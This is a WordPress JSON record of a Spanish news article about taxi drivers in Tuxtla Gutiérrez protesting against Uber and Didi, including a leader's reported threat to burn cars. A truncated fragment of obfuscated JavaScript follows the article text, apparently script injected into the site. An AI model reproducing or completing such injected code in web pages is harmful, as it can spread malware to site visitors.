{"id":15613,"date":"2024-05-15T03:28:43","date_gmt":"2024-05-15T03:28:43","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=15613"},"modified":"2024-05-15T03:28:45","modified_gmt":"2024-05-15T03:28:45","slug":"amagan-taxistas-con-bloquear-entradas-y-salidas-si-no-sacan-a-uber-y-didi-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=15613","title":{"rendered":"Amagan taxistas con bloquear entradas y salidas si no sacan a Uber y Didi de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715743590370-1024x768.jpg\" alt=\"\" class=\"wp-image-15614\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715743590370-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715743590370-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715743590370-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/05\/FB_IMG_1715743590370.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>14 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Decenas de taxistas concesionados realizaron una protesta para exigir al gobierno del estado no permita que las plataformas de Didi y Uber sigan trabajando en Tuxtla Guti\u00e9rrez.<\/p>\n\n\n\n<p>De acuerdo con el presidente de la Coalici\u00f3n de Radio Taxis de Chiapas, Jos\u00e9 Eliseo \u00c1lvarez Guti\u00e9rrez, han buscado la atenci\u00f3n con la Secretar\u00eda General del Gobierno del Estado.<\/p>\n\n\n\n<p>Agreg\u00f3 que, la Secretar\u00eda de Movilidad y Transporte, ha sido escueta en sus di\u00e1logos, limit\u00e1ndose a decir que est\u00e1n pendientes del asunto de Didi, plataforma que, contrario a Uber, \u201cno tiene un amparo y est\u00e1 trabajando sin ning\u00fan derecho\u201d, dijo el l\u00edder de transporte.<\/p>\n\n\n\n<p>\u201cVamos a esperar a ver qu\u00e9 soluci\u00f3n nos da la Secretar\u00eda de Gobierno, o el gobernador, porque al parecer ya estamos en manos del gobernador, esperamos que le d\u00e9 una soluci\u00f3n a medida, porque ya estamos en conflictos; tanto los Didis dicen que nos van a quemar un carro, como nosotros pronunciamos que les vamos a quemar un carro; la primer medida que tomen vamos a quemarles los carros\u201d, declar\u00f3.<br>La marcha fue pac\u00edfica y con direcci\u00f3n al Palacio de Gobierno, no se apreci\u00f3 las dos mil unidades que pretend\u00edan darse cita, sin embargo, la fila de autos amarillos con blanco fue extensa.<br>El presidente de esta coalici\u00f3n sostiene que de no haber soluci\u00f3n, \u201cla pr\u00f3xima (manifestaci\u00f3n) pretendemos parar todo, colectivos, camiones de volteo incluso trailers estamos convocando para el pr\u00f3ximo evento\u201d.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 14 de mayo del 2024. Tuxtla Guti\u00e9rrez. &#8211; Decenas de taxistas concesionados realizaron una protesta para exigir al gobierno del estado no permita que las plataformas de Didi y Uber sigan trabajando en Tuxtla Guti\u00e9rrez. De acuerdo con el presidente de la Coalici\u00f3n de Radio Taxis de Chiapas, Jos\u00e9 Eliseo \u00c1lvarez Guti\u00e9rrez, han &hellip;<\/p>\n","protected":false},"author":2,"featured_media":15614,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-15613","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15613","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15613"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15613\/revisions"}],"predecessor-version":[{"id":15615,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/15613\/revisions\/15615"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/15614"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15613"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15613"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15613"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}